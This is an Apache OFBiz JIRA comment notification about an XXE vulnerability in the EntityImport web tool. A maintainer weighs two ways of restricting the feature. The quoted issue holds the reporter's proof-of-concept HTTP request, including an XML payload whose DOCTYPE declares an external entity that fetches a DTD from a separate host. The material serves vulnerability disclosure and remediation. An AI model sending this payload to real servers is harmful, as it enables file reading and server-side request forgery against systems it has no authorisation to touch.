[ https://issues.apache.org/jira/browse/OFBIZ-12304?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17525612#comment-17525612 ]
Jacques Le Roux commented on OFBIZ-12304: ----------------------------------------- Hi Michael, The security reporter provided a " http packet" that can be used to create a Man In the Middle attack using a tool like Burp. I agree with the rest. There are 2 options: # We could do something like I did for OFBIZ-12602: allow user with the appropriate permissions to use the entity import without this restriction. I have only 1 pb with this solution: what to say to security reporter that reports a similar issue? I suggest we could simply reject them, explaining why, ie needed # As you suggested do the same than point 1 but with a property set to false OOTB What do you think? Maybe it would be better to discuss that in dev ML? Not sure it's necessary ;) > Found a new XXE (XML External Entity Injection) vulnerability in EntityImport > ----------------------------------------------------------------------------- > > Key: OFBIZ-12304 > URL: https://issues.apache.org/jira/browse/OFBIZ-12304 > Project: OFBiz > Issue Type: Sub-task > Components: framework/webtools > Affects Versions: 17.12.08 > Reporter: thiscodecc > Assignee: Jacques Le Roux > Priority: Major > Fix For: Release Branch 17.12, 18.12.01 > > > The http packet is as follows: > POST /webtools/control/entityImport HTTP/1.1 > Host: 127.0.0.1:8443 > User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) > Gecko/20100101 Firefox/91.0 > Accept: text/html,application/xhtml > xml,application/xml;q=0.9,image/webp,*/*;q=0.8 > Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 > Accept-Encoding: gzip, deflate > Referer: https://127.0.0.1:8443/webtools/control/EntityImport > Content-Type: application/x-www-form-urlencoded > Content-Length: 174 > Origin: https://127.0.0.1:8443 > Connection: close > Cookie: JSESSIONID=BC833071F17F30BE022A7D44A5BB78C5.jvm1; > OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; > login_nickname=admin; > UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; > displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; > careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false > Upgrade-Insecure-Requests: 1 > Sec-Fetch-Dest: document > Sec-Fetch-Mode: navigate > Sec-Fetch-Site: same-origin > Sec-Fetch-User: ?1 > fulltext=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE Quan SYSTEM > "http://127.0.0.1:12311/vlab.dtd"><xml-body></xml-body> > -- This message was sent by Atlassian Jira (v8.20.7#820007)